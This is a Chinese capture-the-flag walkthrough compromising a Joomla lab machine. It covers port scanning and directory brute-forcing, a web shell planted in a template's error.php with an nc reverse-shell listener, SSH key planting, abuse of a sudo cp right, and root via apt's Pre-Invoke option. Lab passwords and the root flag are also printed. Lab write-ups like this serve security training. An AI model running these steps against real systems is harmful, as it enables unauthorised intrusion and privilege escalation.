nmap扫描端口:
nmap 192.168.0.19 -p-
开放80端口和22端口
web浏览器打开80端口:
Apache服务的默认页面
web扫描器识别到是joomla框架:
gobuster扫描joomla后台路径:
gobuster.exe dir -u http://192.168.0.19/joomla/ -w dir.txt
后台路径是joomla/administrator/index.php
登录名和密码在/test/password文件的源码中:
管理员是admin,密码是3iqtzi4RhkWANcu@$pa$$
管理员登录ok
编辑模板文件上传shell:
编辑完模板文件然后要点击copy template,取个名字就可以保存成功了。
在error.php中插入shell,这样访问出现错误时,就会自动访问到error.php文件,就可以反弹。
提权:
nc监听端口:
nc.exe -lvvp 1234
访问错误地址反弹nc:
反弹成功
登录用户是www-data。存在另外两个用户一个是shenron,另一个用户是jenny。
在/var/www/html/joomla/configuration.php存在jenny的密码:
jenny的密码是Mypa$$wordi$notharD@123
通过把ssh公钥写入jenny目录下的.ssh文件夹下的authorized_keys中,就可以用私钥登录到jenny。
cd .ssh echo __public key__ >> authorized_keys echo ssh-rsa "生成的公钥串" >> authorized_keys
使用公钥文件登录
jenny登录成功,sudo -l 查看提权命令,jenny可以使用shenron的身份使用cp命令
使用shenron的cp命令替换.ssh文件夹下的authorized_keys,替换成jenny的公钥,这样就可以用jenny的私钥登录到shenron用户。
cp /home/jenny/.ssh/authorized_keys /tmp/ #复制jenny的authorized_keys文件到/tmp/两个用户都可以读取 sudo -u shenron cp /tmp/authorized_keys /home/shenron/.ssh/
shenron用户的密码在/var/opt/password.txt
sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh #使用apt命令提权
Your Root Flag Is Here :- aa087b2d466cd593622798c8e972bffb
下载地址:
ctf提权辅助工具: